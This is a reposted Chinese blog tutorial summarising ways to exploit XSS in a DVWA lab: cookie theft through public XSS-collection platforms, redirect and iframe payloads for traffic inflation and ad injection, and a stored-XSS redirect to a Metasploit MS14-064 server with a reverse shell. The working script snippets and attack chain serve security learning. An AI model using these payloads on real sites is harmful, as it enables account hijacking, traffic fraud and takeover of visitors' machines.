XSS漏洞利用方式汇总

Posted 風月长情

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS漏洞利用方式汇总相关的知识,希望对你有一定的参考价值。

文章目录

以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!!

一、窃取Cookie

1.1 目的

  恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。

1.2 实操

搭建xss平台

这里我直接百度一个xss平台来接Cookie

Tips:为了安全起见,建议使用自己搭建的XSS平台(如测试学习,不敏感的话随意)

》》注册一个测试账号(fengyue@126.com:fengyue123)
xss平台:

  • https://xss.pt
  • https://xsshs.cn

    》》任意创建一个项目


    》》复制payload

获取Cookie

》》这里我们使用靶场DVWA进行测试,在存在xss地方输入payload:


》》点击提交后即可在解cookie平台获取到当前账户的cookie和真实IP:

》》使用管理员的cookie登录系统(使用Chrome上的F12开发者工具,将拿到的Cookie值放入到Application中,浏览器输入跳转的目的地址回车便成功登录他人账户)

二、广告传播/SEO优化/刷取流量

2.1 目的

  通过恶意的JS代码将正常页面跳转到目的页面,利用网站进行重定向实现其引流、广告位传播等目的。

2.2 实操

2.2.1 恶意刷取访问量

网页直接跳转

(3种方式)

<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window. location.replace("跳转的目的地址");</script>
<script type="text/javascript">window. location.assign("跳转的目的地址");</script>

》》为了体现效果,对靶机DVWA 存储型XSS处插入JS代码实现网页跳转:
(用户一访问到此页面就自动访问访问我博客的某一篇文章,访问量就+1)

网页延迟跳转

(网页停留三秒后再进行跳转)

<script type="text/javascript">
  function jumurl()
  window.location.href = 'https://www.baidu.com';
  
  setTimeout(jumurl,3000);
</script>

2.2.2 恶意广告展示

这里可以通过导入外链的方式对受害站点插入广告位,以来传播广告

<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://blog.csdn.net/Aaron_Miller/article/details/105918848></iframe>");</script>

三、网页挂马/权限提升

3.1 目的

  通过木马服务器(kali)搭建生成一个恶意URL地址,并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面,恶意攻击者便获取到了受害者的控制权限(重点在于目的系统是否打了相应补丁)

3.2 环境

  • 木马服务器(Kali  MS14-064  IP:192.168.7.129)
  • 受害者(Windows Server 2003 R2  IP:192.168.7.136)
  • 存在XSS的服务器(Win10 DVWA靶机 IP:192.168.1.103)

3.3 实操

3.3.1 生成木马URL

》》启动Metasploit

》》调用缓冲区溢出漏洞MS14-064(影响范围Win95-Win10,触发该漏洞条件要客户端装有power shell,详情见:微软官网

》》设置木马服务器IP,允许调用powsershell

》》调用反弹连接payload

Tips:reverse_tcp好处:靶机主动连接我们,不用担心靶机防火墙的问题


》》设置监听IP,使用默认监听端口4444,执行攻击(自动生成攻击地址)

3.3.2 XSS插入地址

》》恶意攻击者通过存储型xss将木马服务器生成的地址插入到网站中:

<script type="text/javascript">window.location.href="http://192.168.7.129:8080/W0fGq97a2ICU0
";</script>


》》当存在ms14-064漏洞的主机访问到该页面,攻击者就会获取到目的服务器操作系统的权限(如开启摄像头、添加用户、截屏、录音等)
(win2003r2模拟访问)


以上是关于XSS漏洞利用方式汇总的主要内容,如果未能解决你的问题,请参考以下文章

XSS漏洞常见攻击方式

XSS攻击过滤处理

渗透小知识之XSS攻击利用

经验分享 | XSS手工利用方式

CSRF漏洞的概念利用方式防御方案

XSS(跨站脚本漏洞)谁帮忙修复下,我看着就头大,一窍不通啊。